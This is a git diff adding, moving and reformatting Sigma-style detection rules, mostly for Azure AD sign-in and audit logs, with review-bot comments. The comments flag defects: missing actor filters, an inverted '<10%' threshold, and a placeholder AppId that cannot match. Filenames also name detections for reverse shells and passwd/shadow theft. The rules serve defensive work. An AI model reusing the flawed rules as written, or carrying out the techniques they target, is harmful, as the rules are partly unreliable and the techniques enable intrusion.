src/main/resources/rules/azure/azure_identity_protection_password_spray.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_prt_access.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_suspicious_browser.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_threat_intel.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_token_issuer_anomaly.yml create mode 100644 src/main/resources/rules/azure/azure_identity_protection_unfamilar_sign_in.yml create mode 100644 src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml create mode 100644 src/main/resources/rules/azure/azure_pim_account_stale.yml create mode 100644 src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml create mode 100644 src/main/resources/rules/azure/azure_pim_alerts_disabled.yml create mode 100644 src/main/resources/rules/azure/azure_pim_change_settings.yml create mode 100644 src/main/resources/rules/azure/azure_pim_invalid_license.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml create mode 100644 src/main/resources/rules/azure/azure_pim_role_not_used.yml create mode 100644 src/main/resources/rules/azure/azure_pim_too_many_global_admins.yml create mode 100644 src/main/resources/rules/azure/azure_priviledged_role_assignment_add.yml create mode 100644 src/main/resources/rules/azure/azure_priviledged_role_assignment_bulk_change.yml create mode 100644 src/main/resources/rules/azure/azure_privileged_account_creation.yml create mode 100644 src/main/resources/rules/azure/azure_tap_added.yml create mode 100644 src/main/resources/rules/azure/azure_user_password_change.yml create mode 100644 
src/main/resources/rules/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_delete_identity.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_enum_buckets.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml create mode 100644 src/main/resources/rules/cloudtrail/aws_sso_idp_change.yml create mode 100644 src/main/resources/rules/github/github_push_protection_bypass_detected.yml create mode 100644 src/main/resources/rules/github/github_push_protection_disabled.yml create mode 100644 src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml create mode 100644 src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml create mode 100644 
src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml delete mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml create mode 100644 src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml create mode 100644 src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml rename src/main/resources/rules/linux/{other/lnx_clamav.yml => builtin/clamav/lnx_clamav_relevant_message.yml} (76%) rename src/main/resources/rules/linux/builtin/{lnx_crontab_file_modification.yml => cron/lnx_cron_crontab_file_modification.yml} (54%) create mode 100644 src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml create mode 100644 src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml create mode 100644 src/main/resources/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml create mode 100644 src/main/resources/rules/linux/builtin/lnx_privileged_user_creation.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_proxy_connection.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_setgid_setuid.yml delete mode 100644 src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml create mode 100644 src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml create mode 100644 
src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml rename src/main/resources/rules/linux/builtin/{ => sudo}/lnx_sudo_cve_2019_14287_user.yml (85%) rename src/main/resources/rules/linux/{other/lnx_security_tools_disabling_syslog.yml => builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml} (56%) create mode 100644 src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml create mode 100644 src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml delete mode 100644 src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml rename src/main/resources/rules/linux/{file_create/file_create_lnx_doas_conf_creation.yml => file_event/file_event_lnx_doas_conf_creation.yml} (92%) create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml create mode 100644 src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml delete mode 100644 src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml create mode 100644 src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_guacamole.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_named.yml delete mode 100644 
src/main/resources/rules/linux/other/lnx_susp_ssh.yml delete mode 100644 src/main/resources/rules/linux/other/lnx_susp_vsftp.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml create mode 100644 
src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml delete mode 100644 
src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml rename src/main/resources/rules/linux/{builtin/lnx_sudo_cve_2019_14287.yml => process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml} (76%) create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml create mode 100644 
src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_userdel.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml create mode 100644 src/main/resources/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml create mode 100644 src/main/resources/rules/m365/microsoft365_disabling_mfa.yml create mode 100644 src/main/resources/rules/m365/microsoft365_new_federated_domain_added_audit.yml create 
mode 100644 src/main/resources/rules/m365/microsoft365_new_federated_domain_added_exchange.yml create mode 100644 src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml create mode 100644 src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml create mode 100644 src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml
diff --git a/src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml
new file mode 100644
index 000000000..404b48e3b
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml
@@ -0,0 +1,24 @@
+title: CA Policy Removed by Non Approved Actor
+id: 26e7c5e2-6545-481e-b7e6-050143459635
+status: test
+description: Monitor and alert on conditional access changes where non approved actor removed CA Policy.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access
+author: Corissa Koopmans, '@corissalea'
+date: 2022/07/19
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1548
+ - attack.t1556
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message: Delete conditional access policy
+ condition: selection
+falsepositives:
+ - Misconfigured role permissions
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml
new file mode 100644
index 000000000..1169df50d
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml
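Review bot: The selection in azure_aad_secops_ca_policy_removedby_bad_actor.yml matches every `Delete conditional access policy` audit event, so the "Non Approved Actor" in the title is not implemented — nothing restricts the initiating identity. Either add a filter on the initiator that excludes the approved change-management identities (e.g. `filter: InitiatedBy|contains: '<approved-actor-placeholder>'` with `condition: selection and not filter`), or state in `description` that every deletion is alerted and the actor has to be triaged by hand. The same gap exists in azure_aad_secops_new_ca_policy_addedby_bad_actor.yml and azure_aad_secops_ca_policy_updatedby_bad_actor.yml in this commit.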
@@ -0,0 +1,24 @@
+title: CA Policy Updated by Non Approved Actor
+id: 50a3c7aa-ec29-44a4-92c1-fce229eef6fc
+status: test
+description: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access
+author: Corissa Koopmans, '@corissalea'
+date: 2022/07/19
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1548
+ - attack.t1556
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ keywords:
+ - Update conditional access policy
+ condition: keywords
+falsepositives:
+ - Misconfigured role permissions
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+level: medium
diff --git a/src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml b/src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
new file mode 100644
index 000000000..e6a374399
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
@@ -0,0 +1,22 @@
+title: New CA Policy by Non-approved Actor
+id: 0922467f-db53-4348-b7bf-dee8d0d348c6
+status: test
+description: Monitor and alert on conditional access changes.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure
+author: Corissa Koopmans, '@corissalea'
+date: 2022/07/18
+tags:
+ - attack.defense_evasion
+ - attack.t1548
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message: Add conditional access policy
+ condition: selection
+falsepositives:
+ - Misconfigured role permissions
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+level: medium
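Review bot: azure_aad_secops_ca_policy_updatedby_bad_actor.yml uses a bare `keywords` search for `Update conditional access policy`, while its two sibling rules in this commit pin the same kind of string to `properties.message`. A keyword search runs against the whole event, so any other field that happens to carry that text (a description, a modified-properties blob) also fires, and the rule cannot be mapped field-by-field like the others. For consistency and precision change the detection to `selection:` / `properties.message: Update conditional access policy` / `condition: selection`.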
diff --git a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml
index 7ea030282..330590535 100644
--- a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml
+++ b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_new_server.yml
@@ -1,27 +1,28 @@ title: Azure Active Directory Hybrid Health AD FS New Server id: 288a39fc-4914-4831-9ada-270e9dc12cb4 +status: test description: | - This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. - A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. - This can be done programmatically via HTTP requests to Azure. -status: experimental -date: 2021/08/26 + This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. 
+references: + - https://o365blog.com/post/hybridhealthagent/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/08/26 +modified: 2023/10/11 tags: - - attack.defense_evasion - - attack.t1578 -references: - - https://o365blog.com/post/hybridhealthagent/ + - attack.defense_evasion + - attack.t1578 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - selection: - CategoryValue: 'Administrative' - ResourceProviderValue: 'Microsoft.ADHybridHealthService' - ResourceId|contains: 'AdFederationService' - OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' - condition: selection + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection falsepositives: - - Legitimate AD FS servers added to an AAD Health AD FS service instance + - Legitimate AD FS servers added to an AAD Health AD FS service instance level: medium diff --git a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml index 9d1966ce1..e3b8547b6 100644 --- a/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml +++ b/src/main/resources/rules/azure/azure_aadhybridhealth_adfs_service_delete.yml 
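Review bot: The logsource in azure_aadhybridhealth_adfs_new_server.yml moves from `service: azureactivity` to `service: activitylogs`, and the `CategoryValue`/`ResourceProviderValue`/`OperationNameValue` selection only resolves if this project's azure log-type field mapping is keyed to the new service name; that mapping is not part of this diff, so if it still refers to `azureactivity` the rule stops matching silently rather than failing to load. Please confirm the mapping was updated alongside, or add a test that compiles this rule against the azure log type. The same service rename is made in azure_aadhybridhealth_adfs_service_delete.yml in the next hunk.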
@@ -1,27 +1,28 @@ title: Azure Active Directory Hybrid Health AD FS Service Delete id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff +status: test description: | - This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. - A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. - The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. -status: experimental -date: 2021/08/26 + This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +references: + - https://o365blog.com/post/hybridhealthagent/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/08/26 +modified: 2023/10/11 tags: - - attack.defense_evasion - - attack.t1578.003 -references: - - https://o365blog.com/post/hybridhealthagent/ + - attack.defense_evasion + - attack.t1578.003 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - selection: - CategoryValue: 'Administrative' - ResourceProviderValue: 'Microsoft.ADHybridHealthService' - ResourceId|contains: 'AdFederationService' - OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' - condition: selection + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection falsepositives: - - Legitimate AAD Health AD FS service instances being deleted in a tenant + - Legitimate AAD Health AD 
FS service instances being deleted in a tenant level: medium diff --git a/src/main/resources/rules/azure/azure_account_lockout.yml b/src/main/resources/rules/azure/azure_account_lockout.yml index 102f1de5c..05b4393d7 100644 --- a/src/main/resources/rules/azure/azure_account_lockout.yml +++ b/src/main/resources/rules/azure/azure_account_lockout.yml @@ -1,21 +1,22 @@ title: Account Lockout id: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a -status: experimental -author: AlertIQ -date: 2021/10/10 +status: test description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: AlertIQ +date: 2021/10/10 +modified: 2022/12/25 +tags: + - attack.credential_access + - attack.t1110 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 50053 - condition: selection -level: medium + selection: + ResultType: 50053 + condition: selection falsepositives: - - Unknown -tags: - - attack.credential_access - - attack.t1110 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_account_created_deleted.yml b/src/main/resources/rules/azure/azure_ad_account_created_deleted.yml new file mode 100644 index 000000000..91bc6265f --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_account_created_deleted.yml 
@@ -0,0 +1,25 @@
+title: Account Created And Deleted Within A Close Time Frame
+id: 6f583da0-3a90-4566-a4ed-83c09fe18bbf
+status: test
+description: Detects when an account was created and deleted in a short period of time.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts
+author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
+date: 2022/08/11
+modified: 2022/08/18
+tags:
+ - attack.defense_evasion
+ - attack.t1078
+logsource:
+ product: azure
+ service: auditlogs
+detection:
+ selection:
+ properties.message:
+ - Add user
+ - Delete user
+ Status: Success
+ condition: selection
+falsepositives:
+ - Legit administrative action
+level: high
diff --git a/src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml b/src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml
new file mode 100644
index 000000000..e239a5655
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_auth_failure_increase.yml
@@ -0,0 +1,22 @@
+title: Increased Failed Authentications Of Any Type
+id: e1d02b53-c03c-4948-b11d-4d00cca49d03
+status: test
+description: Detects when sign-ins increased by 10% or greater.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
+author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'
+date: 2022/08/11
+tags:
+ - attack.defense_evasion
+ - attack.t1078
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: failure
+ Count: "<10%"
+ condition: selection
+falsepositives:
+ - Unlikely
+level: medium
diff --git a/src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml b/src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml
new file mode 100644
index 000000000..3c4751ae4
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_auth_sucess_increase.yml
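Review bot: azure_ad_account_created_deleted.yml is titled "Within A Close Time Frame", but the selection is a plain `Add user` OR `Delete user` with `Status: Success`, so at level high it fires on every successful user creation and every deletion with no correlation between the two events. Unless this project's engine wraps the rule in a time window (nothing in the file asks for one), the description should state that the temporal correlation has to be done downstream and the level lowered, or the rule should be expressed as a correlation over the two events. The `falsepositives` entry should then also name routine provisioning and deprovisioning rather than only "Legit administrative action".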
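Review bot: In azure_ad_auth_failure_increase.yml the selection `Count: "<10%"` contradicts the description "increased by 10% or greater", and `Count` is not a field of a single sign-in event but an aggregate, so a per-event field match will either never fire or compare against the literal string. If the engine cannot express the aggregation, say in `description` that this is a template to be implemented as a count/threshold query and set `status` accordingly; if it can, the comparison should read `>=10%` or move into an aggregation condition. The same inverted `"<10%"` appears in azure_ad_auth_sucess_increase.yml in the next hunk.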
@@ -0,0 +1,23 @@
+title: Measurable Increase Of Successful Authentications
+id: 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae
+status: test
+description: Detects when successful sign-ins increased by 10% or greater.
+references:
+ - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins
+author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
+date: 2022/08/11
+modified: 2022/08/18
+tags:
+ - attack.defense_evasion
+ - attack.t1078
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: Success
+ Count: "<10%"
+ condition: selection
+falsepositives:
+ - Increase of users in the environment
+level: low
diff --git a/src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml b/src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml
new file mode 100644
index 000000000..4f4495d31
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml
@@ -0,0 +1,23 @@
+title: Authentications To Important Apps Using Single Factor Authentication
+id: f272fb46-25f2-422c-b667-45837994980f
+status: test
+description: Detect when authentications to important application(s) only required single-factor authentication
+references:
+ - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts
+author: MikeDuddington, '@dudders1'
+date: 2022/07/28
+tags:
+ - attack.initial_access
+ - attack.t1078
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: 'Success'
+ AppId: 'Insert Application ID use OR for multiple'
+ AuthenticationRequirement: 'singleFactorAuthentication'
+ condition: selection
+falsepositives:
+ - If this was approved by System Administrator.
+level: medium
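Review bot: `AppId: 'Insert Application ID use OR for multiple'` in azure_ad_auth_to_important_apps_using_single_factor_auth.yml is an instruction to the reader left in the match value, so as shipped the rule can never match a real application ID and loads as a silent no-op. Because this file is packaged under src/main/resources, the instruction belongs in `description` (e.g. "Replace AppId with the application IDs you consider important before enabling this rule") with a clearly labelled placeholder value, or the rule should stay out of the default-enabled set until it has been tuned.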
diff --git a/src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml b/src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml
new file mode 100644
index 000000000..9aa985a10
--- /dev/null
+++ b/src/main/resources/rules/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml
@@ -0,0 +1,25 @@
+title: Successful Authentications From Countries You Do Not Operate Out Of
+id: 8c944ecb-6970-4541-8496-be554b8e2846
+status: test
+description: Detect successful authentications from countries you do not operate out of.
+references:
+ - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts
+author: MikeDuddington, '@dudders1'
+date: 2022/07/28
+tags:
+ - attack.initial_access
+ - attack.credential_access
+ - attack.t1078.004
+ - attack.t1110
+logsource:
+ product: azure
+ service: signinlogs
+detection:
+ selection:
+ Status: 'Success'
+ filter:
+ Location|contains: ''
+ condition: selection and not filter
+falsepositives:
+ - If this was approved by System Administrator.
+level: medium
